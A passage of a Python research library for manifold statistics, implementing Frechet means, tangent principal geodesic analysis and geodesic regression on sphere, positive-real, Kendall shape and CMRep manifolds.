# elif dataList[ 0 ].Type == "Euclidean":
# return FrechetMean_Euclidean( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "CMRep":
# return FrechetMean_CMRep( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "CMRep_BNDRNormals":
# return FrechetMean_CMRep_BNDRNormals( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "CMRep_Abstract":
# return FrechetMean_CMRep_Abstract( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "Kendall2D":
# return FrechetMean_Kendall2D( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "Scale_Kendall2D":
# return FrechetMean_Scale_Kendall2D( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "MRep":
# return FrechetMean_MRep( dataList, maxIter, tol )
else:
print( "Manifold type is not known" )
return -1
def WeightedFrechetMean_Sphere( dataList, wList, maxIter = 500, tol = 0.001, stepsize=0.005 ):
# Weight List should be sum-to-one normalized
mu = dataList[0]
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
for i in range( maxIter ):
dMu = manifolds.sphere_tVec( nManDim )
for j in range( nData ):
if np.abs( wList[ j ] ) < 1e-12:
continue
Log_mu_to_y_j = mu.LogMap( dataList[ j ] )
for d in range( nManDim ):
dMu.tVector[ d ] += stepsize * ( ( wList[ j ] ) * Log_mu_to_y_j.tVector[ d ] )
Mu_i = mu.ExponentialMap( dMu )
mu = Mu_i
return mu
######################################
########## Tangent PGA ##########
######################################
def TangentPGA( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
if dataList[ 0 ].Type == "Sphere":
return TangentPGA_Sphere( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "PositiveReal":
return TangentPGA_PosReal( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "Euclidean":
return TangentPGA_Euclidean( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep":
return TangentPGA_CMRep( dataList, maxIter, tol, stepsize )
elif dataList[ 0 ].Type == "CMRep_Abstract":
return TangentPGA_CMRep_Abstract( dataList, maxIter, tol, stepsize )
# elif dataList[ 0 ].Type == "MRep":
# return FrechetMean_MRep( dataList, maxIter, tol )
else:
print( "Manifold type is not known" )
return -1
def TangentPGA_Sphere( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
# Intrinsic Mean
mu = FrechetMean( dataList, maxIter, tol, stepsize )
# Covariance matrix on a tangent vector space
S = np.zeros( [ nManDim, nManDim ] )
for i in range( nData ):
tVec_i = mu.LogMap( dataList[ i ] )
u_j_mat = np.asmatrix( tVec_i.tVector )
u_j_mat = u_j_mat.flatten()
u_j_u_j_t = np.dot( u_j_mat.T, u_j_mat )
S = np.add( S, np.multiply( 1.0 / float( nData ), u_j_u_j_t ) )
# w : Eigen values
# v : Eigen vectors
[ w, v ] = np.linalg.eig( S )
w_sortIdx = np.abs( w ).argsort()
w = w[ w_sortIdx[ ::-1 ] ]
v = v[ :, w_sortIdx[ ::-1 ] ]
w = np.real( w )
v = np.real( v )
return w, v, mu
def TangentPGA_PosReal( dataList, maxIter = 500, tol = 0.001, stepsize=0.01):
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
# Intrinsic Mean
mu = FrechetMean( dataList, maxIter, tol, stepSize )
# Covariance matrix on a tangent vector space
S = np.zeros( [ nManDim, nManDim ] )
for i in range( nData ):
tVec_i = mu.LogMap( dataList[ i ] )
u_j_mat = np.asmatrix( tVec_i.tVector )
u_j_mat = u_j_mat.flatten()
u_j_u_j_t = np.dot( u_j_mat.T, u_j_mat )
S = np.add( S, np.multiply( 1.0 / float( nData ), u_j_u_j_t ) )
# w : Eigen values
# v : Eigen vectors
[ w, v ] = np.linalg.eig( S )
w_sortIdx = np.abs( w ).argsort()
w = w[ w_sortIdx[ ::-1 ] ]
v = v[ :, w_sortIdx[ ::-1 ] ]
w = np.real( w )
v = np.real( v )
return w, v, mu
def TangentPGA_Euclidean( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
# Intrinsic Mean
mu = FrechetMean( dataList, maxIter, tol, stepSize )
# Covariance matrix on a tangent vector space
S = np.zeros( [ nManDim, nManDim ] )
for i in range( nData ):
tVec_i = mu.LogMap( dataList[ i ] )
u_j_mat = np.asmatrix( tVec_i.tVector )
u_j_mat = u_j_mat.flatten()
u_j_u_j_t = np.dot( u_j_mat.T, u_j_mat )
S = np.add( S, np.multiply( 1.0 / float( nData ), u_j_u_j_t ) )
# w : Eigen values
# v : Eigen vectors
[ w, v ] = np.linalg.eig( S )
w_sortIdx = np.abs( w ).argsort()
w = w[ w_sortIdx[ ::-1 ] ]
v = v[ :, w_sortIdx[ ::-1 ] ]
w = np.real( w )
v = np.real( v )
return w, v, mu
# Deprecated for now
def TangentPGA_CMRep( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
mu = FrechetMean( dataList, maxIter, tol, stepsize )
return mu
def TangentPGA_CMRep_Abstract( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nManDim = dataList[ 0 ].nDim
nData = len( dataList )
print( "# of Data" )
print( nData )
# Intrinsic Mean
mu = FrechetMean( dataList, maxIter, tol, stepsize )
# Covariance matrix on a tangent vector space
nCenterDim = dataList[ 0 ].pt[ 0 ].nDim
nScaleDim = dataList[ 0 ].pt[ 1 ].nDim
nPreShapeDim = dataList[ 0 ].pt[ 2 ].nDim
nRadiusDim = dataList[ 0 ].pt[ 3 ].nDim
# Total Dimension
nManDim_Cov = nCenterDim + nScaleDim + nPreShapeDim + nRadiusDim
S = np.zeros( [ nManDim_Cov, nManDim_Cov ] )
for i in range( nData ):
tVec_i = mu.LogMap( dataList[ i ] )
u_j_mat = np.zeros( [ 1, nManDim_Cov ] )
u_j_mat_center = np.asarray( tVec_i.tVector[ 0 ].tVector ).flatten()
u_j_mat_scale = np.asarray( tVec_i.tVector[ 1 ].tVector ).flatten()
u_j_mat_preshape = np.asarray( tVec_i.tVector[ 2 ].tVector ).flatten()
u_j_mat_radius = np.asarray( tVec_i.tVector[ 3 ].tVector ).flatten()
for d in range( nCenterDim ):
u_j_mat[ 0, d ] = u_j_mat_center[ d ]
for d in range( nScaleDim ):
# u_j_mat[ 0, d + nCenterDim ] = dataList[ i ].meanRadius * u_j_mat_scale[ d ]
u_j_mat[ 0, d + nCenterDim ] = u_j_mat_scale[ d ]
for d in range( nPreShapeDim ):
# u_j_mat[ 0, d + nCenterDim + nScaleDim ] = dataList[ i ].meanRadius * u_j_mat_preshape[ d ]
u_j_mat[ 0, d + nCenterDim + nScaleDim ] = u_j_mat_preshape[ d ]
for d in range( nRadiusDim ):
# u_j_mat[ 0, d + nCenterDim + nScaleDim + nPreShapeDim ] = dataList[ i ].meanRadius * u_j_mat_radius[ d ]
u_j_mat[ 0, d + nCenterDim + nScaleDim + nPreShapeDim ] = u_j_mat_radius[ d ]
u_j_u_j_t = np.dot( u_j_mat.T, u_j_mat )
print( u_j_u_j_t.shape )
S = np.add( S, np.multiply( 1.0 / float( nData ), u_j_u_j_t ) )
# w : Eigen values
# v : Eigen vectors
[ w, v ] = np.linalg.eig( S )
w_sortIdx = np.abs( w ).argsort()
w = w[ w_sortIdx[ ::-1 ] ]
v = v[ :, w_sortIdx[ ::-1 ] ]
w = np.real( w )
v = np.real( v )
return w, v, mu
def TangentPGA_CMRep_Abstract_Normal_Arr( dataList, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nObj = len( dataList )
nData = len( dataList[ 0 ] )
nManDim = dataList[ 0 ][ 0 ].nDim
print( "# of Data" )
print( nData )
mu_arr = []
for i in range( nObj ):
mu_i = FrechetMean_CMRep_Abstract_Normal( dataList[ i ], maxIter, tol, stepsize )
mu_arr.append( mu_i )
return mu_arr
# # Covariance matrix on a tangent vector space
# nCenterDim = dataList[ 0 ][ 0 ].pt[ 0 ].nDim
# nScaleDim = dataList[ 0 ][ 0 ].pt[ 1 ].nDim
# nPreShapeDim = dataList[ 0 ][ 0 ].pt[ 2 ].nDim
# nRadiusDim = dataList[ 0 ][ 0 ].pt[ 3 ].nDim
# nNormal1Dim = len( dataList[ 0 ][ 0 ].pt[ 4 ] )
# nNormal2Dim = len( dataList[ 0 ][ 0 ].pt[ 5 ] )
# # Total Dimension
# nManDim_Cov = ( nCenterDim + nScaleDim + nPreShapeDim + nRadiusDim + ( nNormal1Dim * 3 ) + ( nNormal1Dim * 3 ) ) * nObj
# nManDim_a = nCenterDim + nScaleDim + nPreShapeDim + nRadiusDim + ( nNormal1Dim * 3 ) + ( nNormal1Dim * 3 )
# S = np.zeros( [ nManDim_Cov, nManDim_Cov ] )
# for i in range( nData ):
# u_mat_i = []
# for a in range( nObj ):
# tVec_a_i = mu_arr[ a ].LogMap( dataList[ a ][ i ] )
# u_mat_a_i = tVec_a_i.GetTangentVectorArray()
# u_mat_i.extend( u_mat_a_i )
# u_mat_i = np.asarray( u_mat_i )
# u_i_u_i_t = np.dot( u_mat_i.T, u_mat_i )
# print( u_i_u_i_t.shape )
# S = np.add( S, np.multiply( 1.0 / float( nData ), u_i_u_i_t ) )
# # w : Eigen values
# # v : Eigen vectors
# [ w, v ] = np.linalg.eig( S )
# w_sortIdx = np.abs( w ).argsort()
# w = w[ w_sortIdx[ ::-1 ] ]
# v = v[ :, w_sortIdx[ ::-1 ] ]
# w = np.real( w )
# v = np.real( v )
# return w, v, mu_arr
def TangentPGA_CMRep_Abstract_Normal_Mu_Arr( dataList, mu_arr, maxIter = 500, tol = 0.001, stepsize=0.01 ):
nObj = len( dataList )
nData = len( dataList[ 0 ] )
nManDim = dataList[ 0 ][ 0 ].nDim
print( "# of Data" )
print( nData )
# mu_arr = []
# for i in range( nObj ):
# mu_i = FrechetMean_CMRep_Abstract_Normal( dataList[ 0 ], maxIter, tol, stepsize )
# mu_arr.append( mu_i )
# Covariance matrix on a tangent vector space
nCenterDim = dataList[ 0 ][ 0 ].pt[ 0 ].nDim
nScaleDim = dataList[ 0 ][ 0 ].pt[ 1 ].nDim
nPreShapeDim = dataList[ 0 ][ 0 ].pt[ 2 ].nDim
nRadiusDim = dataList[ 0 ][ 0 ].pt[ 3 ].nDim
nNormal1Dim = len( dataList[ 0 ][ 0 ].pt[ 4 ] )
nNormal2Dim = len( dataList[ 0 ][ 0 ].pt[ 5 ] )
# Total Dimension
nManDim_Cov = ( nCenterDim + nScaleDim + nPreShapeDim + nRadiusDim + ( nNormal1Dim * 3 ) + ( nNormal1Dim * 3 ) ) * nObj
nManDim_a = nCenterDim + nScaleDim + nPreShapeDim + nRadiusDim + ( nNormal1Dim * 3 ) + ( nNormal1Dim * 3 )
S = np.zeros( [ nManDim_Cov, nManDim_Cov ] )
for i in range( nData ):
u_mat_i = []
for a in range( nObj ):
tVec_a_i = mu_arr[ a ].LogMap( dataList[ a ][ i ] )
u_mat_a_i = tVec_a_i.GetTangentVectorArray()
u_mat_i.extend( u_mat_a_i )
u_mat_i = np.asarray( u_mat_i )
u_i_u_i_t = np.dot( u_mat_i.T, u_mat_i )
print( u_i_u_i_t.shape )
S = np.add( S, np.multiply( 1.0 / float( nData ), u_i_u_i_t ) )
# w : Eigen values
# v : Eigen vectors
[ w, v ] = np.linalg.eig( S )
w_sortIdx = np.abs( w ).argsort()
w = w[ w_sortIdx[ ::-1 ] ]
v = v[ :, w_sortIdx[ ::-1 ] ]
w = np.real( w )
v = np.real( v )
return w, v, mu_arr
#####################################################################
####### Geodesic Regression Models #######
#####################################################################
def GeodesicRegression( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 0.01, verbose=True ):
if pt_list[ 0 ].Type == "Sphere":
return GeodesicRegression_Sphere( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "PositiveReal":
return GeodesicRegression_PosReal( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "Euclidean":
return GeodesicRegression_Euclidean( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "CMRep":
return GeodesicRegression_CMRep( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "CMRep_Abstract":
return GeodesicRegression_CMRep_Abstract( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "Kendall2D":
return GeodesicRegression_Kendall2D( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
elif pt_list[ 0 ].Type == "Scale_Kendall2D":
return GeodesicRegression_Scale_Kendall2D( t_list, pt_list, max_iter, stepSize, step_tol, verbose )
else:
print( "Manifold type is not known" )
return -1
def GeodesicRegression_Sphere( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
nDimManifold = pt_list[ 0 ].nDim
nData = len( pt_list )
# Initial point on manifold and tangent vector
t_min_idx = np.argmin( t_list )
p_anchor = pt_list[ t_min_idx ]
t_max_idx = np.argmax( t_list )
p_end = pt_list[ t_max_idx ]
# Initial point on manifold and tangent vector
init_Interp = manifolds.sphere( nDimManifold )
init_Interp.SetPoint( p_anchor.pt )
init_tVec = p_anchor.LogMap( p_end )
base = init_Interp
tangent = init_tVec
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prevTangent = tangent
for i in range( max_iter ):
pt_grad = manifolds.sphere( nDimManifold )
pt_grad.SetPoint( np.zeros( nDimManifold ).tolist() )
tVec_grad = manifolds.sphere_tVec( nDimManifold )
energy = 0.0
for n in range( nData ):
target = pt_list[ n ]
time_pt = t_list[ n ]
current_tangent = manifolds.sphere_tVec( nDimManifold )
for d in range( nDimManifold ):
current_tangent.tVector[ d ] = tangent.tVector[ d ] * time_pt
estimate = base.ExponentialMap( current_tangent )
# Tangent from base to estimate
be = base.LogMap( estimate )
# The tangential error on one data point
et = estimate.LogMap( target )
# Shooting in the opposite direction
eb = estimate.LogMap( base )
# Energy of the tangential error
energy += et.normSquared()
# Calculate adjoint gradient using Jacobi Field
jOutput, jOutputDash = estimate.AdjointGradientJacobi( eb, et, manifolds.sphere_tVec( nDimManifold ) )
# Sum individual gradient from each data point to gradient
for d in range( nDimManifold ):
pt_grad.pt[ d ] = pt_grad.pt[ d ] + jOutput.tVector[ d ]
tVec_grad.tVector[ d ] = tVec_grad.tVector[ d ] + ( jOutputDash.tVector[ d ] * time_pt )
# Gradient * stepSize
pointGradient_Step = manifolds.sphere_tVec( nDimManifold )
for d in range( nDimManifold ):
pointGradient_Step.tVector[ d ] = pt_grad.pt[ d ] * stepSize
# Update Base
newBase = base.ExponentialMap( pointGradient_Step )
# Update Tangent
updatedTangent = manifolds.sphere_tVec( nDimManifold )
for d in range( nDimManifold ):
updatedTangent.tVector[ d ] = tangent.tVector[ d ] + tVec_grad.tVector[ d ] * stepSize
# Parallel translate updated tangent from a previous base to the updated base
newTangent = base.ParallelTranslateAtoB( base, newBase, updatedTangent )
if energy > prevEnergy:
stepSize = stepSize * 0.5
base = prevBase
tangent = prevTangent
if verbose:
print( "==================================" )
print( "Warning: Energy Increased")
print( "Half the step size")
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
else:
prevBase = base
prevTangent = tangent
base = newBase
tangent = newTangent
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent
def GeodesicRegression_Kendall2D( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
nDimManifold = pt_list[ 0 ].nPt
nData = len( pt_list )
t_min_idx = np.argmin( t_list )
p_anchor = pt_list[ t_min_idx ]
t_max_idx = np.argmax( t_list )
p_end = pt_list[ t_max_idx ]
# Initial point on manifold and tangent vector
init_Interp = manifolds.kendall2D( nDimManifold )
init_Interp.SetPoint( p_anchor.pt )
init_tVec = p_anchor.LogMap( p_end )
base = init_Interp
tangent = init_tVec
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prevTangent = tangent
nUpdated = 0
for i in range( max_iter ):
pt_grad = manifolds.kendall2D( nDimManifold )
tVec_grad = manifolds.kendall2D_tVec( nDimManifold )
energy = 0.0
for n in range( nData ):
target = pt_list[ n ]
time_pt = t_list[ n ]
current_tangent = manifolds.kendall2D_tVec( nDimManifold )
for d in range( nDimManifold ):
for k in range( 2 ):
current_tangent.tVector[ k, d ] = tangent.tVector[ k, d ] * time_pt
estimate = base.ExponentialMap( current_tangent )
# Tangent from base to estimate
be = base.LogMap( estimate )
# The tangential error on one data point
et = estimate.LogMap( target )
# Shooting in the opposite direction
eb = estimate.LogMap( base )
# Energy of the tangential error
energy += et.normSquared()
# Calculate adjoint gradient using Jacobi Field
jOutput, jOutputDash = estimate.AdjointGradientJacobi( eb, et, manifolds.kendall2D_tVec( nDimManifold ) )
# Sum individual gradient from each data point to gradient
for d in range( nDimManifold ):
for k in range( 2 ):
pt_grad.pt[ k, d ] = pt_grad.pt[ k, d ] + jOutput.tVector[ k, d ]
tVec_grad.tVector[ k, d ] = tVec_grad.tVector[ k, d ] + ( jOutputDash.tVector[ k, d ] * time_pt )
# Gradient * stepSize
pointGradient_Step = manifolds.kendall2D_tVec( nDimManifold )
for d in range( nDimManifold ):
for k in range( 2 ):
pointGradient_Step.tVector[ k, d ] = pt_grad.pt[ k, d ] * stepSize
# Update Base
newBase = base.ExponentialMap( pointGradient_Step )
# Update Tangent
updatedTangent = manifolds.kendall2D_tVec( nDimManifold )
for d in range( nDimManifold ):
for k in range( 2 ):
updatedTangent.tVector[ k, d ] = tangent.tVector[ k, d ] + tVec_grad.tVector[ k, d ] * stepSize
# Parallel translate updated tangent from a previous base to the updated base
newTangent = base.ParallelTranslateAtoB( base, newBase, updatedTangent )
if energy >= prevEnergy:
stepSize = stepSize * 0.5
base = prevBase
tangent = prevTangent
if verbose:
print( "==================================" )
print( "Warning: Energy Increased")
print( "Half the step size")
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
else:
prevBase = base
prevTangent = tangent
base = newBase
tangent = newTangent
prevEnergy = energy
nUpdated += 1
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
print( "=============================" )
print( " # of Actual Updates " )
print( nUpdated )
print( "=============================" )
return base, tangent
def GeodesicRegression_PosReal( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
nDimManifold = pt_list[ 0 ].nDim
nData = len( pt_list )
# Initial point on manifold and tangent vector
init_Interp = manifolds.pos_real( nDimManifold )
init_tVec = manifolds.pos_real_tVec( nDimManifold )
init_Interp.SetPoint( pt_list[ 0 ].pt )
base = init_Interp
tangent = init_tVec
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prevTangent = tangent
for i in range( max_iter ):
pt_grad = manifolds.pos_real( nDimManifold )
pt_grad.SetPoint( np.ones( nDimManifold ).tolist() )
tVec_grad = manifolds.pos_real_tVec( nDimManifold )
energy = 0.0
for n in range( nData ):
target = pt_list[ n ]
time_pt = t_list[ n ]
current_tangent = manifolds.pos_real_tVec( nDimManifold )
for d in range( nDimManifold ):
current_tangent.tVector[ d ] = tangent.tVector[ d ] * time_pt
estimate = base.ExponentialMap( current_tangent )
# Tangent from base to estimate
be = base.LogMap( estimate )
# The tangential error on one data point
et = estimate.LogMap( target )
# Shooting in the opposite direction
eb = estimate.LogMap( base )
# Energy of the tangential error
energy += et.normSquared()
# Calculate adjoint gradient using Jacobi Field
jOutput, jOutputDash = estimate.AdjointGradientJacobi( eb, et, manifolds.pos_real_tVec( nDimManifold ) )
# Sum individual gradient from each data point to gradient
for d in range( nDimManifold ):
pt_grad.pt[ d ] = pt_grad.pt[ d ] + jOutput.tVector[ d ]
tVec_grad.tVector[ d ] = tVec_grad.tVector[ d ] + ( jOutputDash.tVector[ d ] * time_pt )
# Gradient * stepSize
pointGradient_Step = manifolds.pos_real_tVec( nDimManifold )
for d in range( nDimManifold ):
pointGradient_Step.tVector[ d ] = pt_grad.pt[ d ] * stepSize
# Update Base
newBase = base.ExponentialMap( pointGradient_Step )
# Update Tangent
updatedTangent = manifolds.pos_real_tVec( nDimManifold )
for d in range( nDimManifold ):
updatedTangent.tVector[ d ] = tangent.tVector[ d ] + tVec_grad.tVector[ d ] * stepSize
# Parallel translate updated tangent from a previous base to the updated base
newTangent = base.ParallelTranslateAtoB( base, newBase, updatedTangent )
if energy > prevEnergy:
stepSize = stepSize * 0.5
base = prevBase
tangent = prevTangent
if verbose:
print( "==================================" )
print( "Warning: Energy Increased")
print( "Half the step size")
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
else:
prevBase = base
prevTangent = tangent
base = newBase
tangent = newTangent
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent
def GeodesicRegression_Euclidean( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
return LinearizedGeodesicRegression_Euclidean( t_list, pt_list, 100, stepSize, step_tol, False, verbose )
def GeodesicRegression_CMRep( t_list, pt_list, max_iter = 500, stepSize = 0.01, step_tol = 1e-8, verbose=True ):
nManDim = pt_list[ 0 ].nDim
base = manifolds.cmrep( nManDim )
tangent = manifolds.cmrep_tVec( nManDim )
nData = len( pt_list )
for i in range( nManDim ):
pt_list_pos_i = []
pt_list_rad_i = []
for j in range( nData ):
pt_list_pos_i.append( pt_list[ j ].pt[ i ][ 0 ] )
pt_list_rad_i.append( pt_list[ j ].pt[ i ][ 1 ] )
t_list_pos_i = list( t_list )
t_list_rad_i = list( t_list )
print( t_list_pos_i )
base_pos_i, tangent_pos_i = GeodesicRegression( t_list_pos_i, pt_list_pos_i, max_iter, stepSize, step_tol, False )
base_rad_i, tangent_rad_i = GeodesicRegression( t_list_rad_i, pt_list_rad_i, max_iter, 1e-3, step_tol, True )
base.SetPosition( i, base_pos_i.pt )
base.SetRadius( i, base_rad_i.pt )
tangent.SetPositionTangentVector( i, tangent_pos_i.tVector )
tangent.SetRadiusTangentVector( i, tangent_rad_i.tVector )
return base, tangent
def GeodesicRegression_CMRep_Abstract( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
nManDim = pt_list[ 0 ].nDim
base = manifolds.cmrep_abstract( nManDim )
tangent = manifolds.cmrep_abstract_tVec( nManDim )
nData = len( pt_list )
base_pt_arr = []
tangent_tVec_arr = []
for i in range( 4 ):
pt_list_i = []
t_list_i = list( t_list )
for j in range( nData ):
pt_list_i.append( pt_list[ j ].pt[ i ] )
base_i, tangent_i = GeodesicRegression( t_list_i, pt_list_i, max_iter, stepSize, step_tol, verbose )
base_pt_arr.append( base_i )
tangent_tVec_arr.append( tangent_i )
base.SetPoint( base_pt_arr )
tangent.SetTangentVector( tangent_tVec_arr )
base.UpdateMeanRadius()
return base, tangent
def GeodesicRegression_Scale_Kendall2D( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, verbose=True ):
nManDim = pt_list[ 0 ].nPt
base = manifolds.scale_kendall2D( nManDim )
tangent = manifolds.scale_kendall2D_tVec( nManDim )
nData = len( pt_list )
base_pt_arr = []
tangent_tVec_arr = []
for i in range( 2 ):
pt_list_i = []
t_list_i = list( t_list )
for j in range( nData ):
pt_list_i.append( pt_list[ j ].pt[ i ] )
base_i, tangent_i = GeodesicRegression( t_list_i, pt_list_i, max_iter, stepSize, step_tol, verbose )
base_pt_arr.append( base_i )
tangent_tVec_arr.append( tangent_i )
base.SetPoint( base_pt_arr )
tangent.SetTangentVector( tangent_tVec_arr )
return base, tangent
#############################################################################
### Anchor Point Linearized Geodesic Regression ###
#############################################################################
def LinearizedGeodesicRegression( t_list, pt_list, max_iter = 500, stepSize = 0.05, step_tol = 0.01, useFrechetMeanAnchor = False, verbose=False ):
if pt_list[ 0 ].Type == "Sphere":
return LinearizedGeodesicRegression_Sphere( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "Kendall2D":
return LinearizedGeodesicRegression_Kendall2D( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "PositiveReal":
return LinearizedGeodesicRegression_PosReal( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "Euclidean":
return LinearizedGeodesicRegression_Euclidean( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "CMRep":
return LinearizedGeodesicRegression_CMRep( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "CMRep_Abstract":
return LinearizedGeodesicRegression_CMRep_Abstract( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "CMRep_Abstract_Normal":
return LinearizedGeodesicRegression_CMRep_Abstract_Normal( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
elif pt_list[ 0 ].Type == "Scale_Kendall2D":
return LinearizedGeodesicRegression_Scale_Kendall2D( t_list, pt_list, max_iter, stepSize, step_tol, useFrechetMeanAnchor, verbose )
else:
print( "Manifold type is not known" )
return -1
def LinearizedGeodesicRegression_Sphere( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nData = len( pt_list )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( pt_list )
else:
t_min_idx = np.argmin( t_list )
p_anchor = pt_list[ t_min_idx ]
nManifoldDim = p_anchor.nDim
# Initial point on manifold and tangent vector
init_Interp = manifolds.sphere( nManifoldDim )
init_tVec = manifolds.sphere_tVec( nManifoldDim )
base = init_Interp
tangent = init_tVec
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prevTangent = tangent
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( pt_list[ j ] )
for d in range( nManifoldDim ):
w_list[d].append( tVec_j.tVector[d] )
estModel_list = []
for d in range( nManifoldDim ):
t_list_sm = sm.add_constant( t_list )
w_d_np = np.asarray( w_list[ d ] )
LS_model_d = sm.OLS( w_d_np, t_list_sm )
est_d = LS_model_d.fit(method='qr')
# est_d = LS_model_d.fit()
estModel_list.append( est_d )
# if verbose:
# print( est_d.summary() )
v_tangent_on_p_anchor = manifolds.sphere_tVec( nManifoldDim )
v_to_base_on_p_anchor = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
v_tangent_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 1 ]
v_to_base_on_p_anchor.tVector[ d ] = estModel_list[ d ].params[ 0 ]
print( "Anchor point to base" )
print( v_to_base_on_p_anchor.tVector )
newBase = p_anchor.ExponentialMap( v_to_base_on_p_anchor )
newTangent = p_anchor.ParallelTranslateAtoB( p_anchor, newBase, v_tangent_on_p_anchor )
energy = 0
for n in range( nData ):
time_pt = t_list[ n ]
target = pt_list[ n ]
current_tangent = manifolds.sphere_tVec( nManifoldDim )
for d in range( nManifoldDim ):
current_tangent.tVector[ d ] = newTangent.tVector[ d ] * time_pt
estimate_n = newBase.ExponentialMap( current_tangent )
et = estimate_n.LogMap( target )
# Energy of the tangential error
energy += et.normSquared()
if energy >= prevEnergy:
if verbose:
print( "=========================" )
print( " Energy Increased " )
print ( energy )
print( "=========================" )
break;
else:
prevBase = newBase
prevTangent = newTangent
p_anchor = newBase
base = newBase
tangent = newTangent
prevEnergy = energy
if verbose:
print( "==================================" )
print( str( i ) + "th Iteration " )
print( energy )
print( "==================================" )
if stepSize < step_tol:
if verbose:
print( "==================================" )
print( "Step size under tolerance")
print( "Aborting")
print( "==================================" )
break
return base, tangent
def LinearizedGeodesicRegression_Kendall2D( t_list, pt_list, max_iter = 100, stepSize = 0.05, step_tol = 1e-8, useFrechetMeanAnchor = False, verbose=True ):
nData = len( pt_list )
if verbose:
print( "=================================================================" )
print( " Linear Regression on Anchor Point Tangent Vector Space " )
print( "=================================================================" )
# Initialize an anchor point
if useFrechetMeanAnchor:
p_anchor = FrechetMean( pt_list )
else:
t_min_idx = np.argmin( t_list )
p_anchor = pt_list[ t_min_idx ]
nManifoldDim = p_anchor.nPt
# Initial point on manifold and tangent vector
init_Interp = manifolds.kendall2D( nManifoldDim )
init_tVec = manifolds.kendall2D_tVec( nManifoldDim )
base = init_Interp
tangent = init_tVec
# Iteration Parameters
prevEnergy = 1e10
prevBase = base
prevTangent = tangent
for i in range( max_iter ):
tVec_list = []
w_list = []
for d in range( nManifoldDim ):
for k in range( 2 ):
w_list.append( [] )
for j in range( nData ):
tVec_j = p_anchor.LogMap( pt_list[ j ] )
for k in range( 2 ):
for d in range( nManifoldDim ):
w_list[ k * nManifoldDim + d ].append( tVec_j.tVector[k, d] )
estModel_list = []
for k in range( 2 ):
for d in range( nManifoldDim ):
t_list_sm = sm.add_constant( t_list )
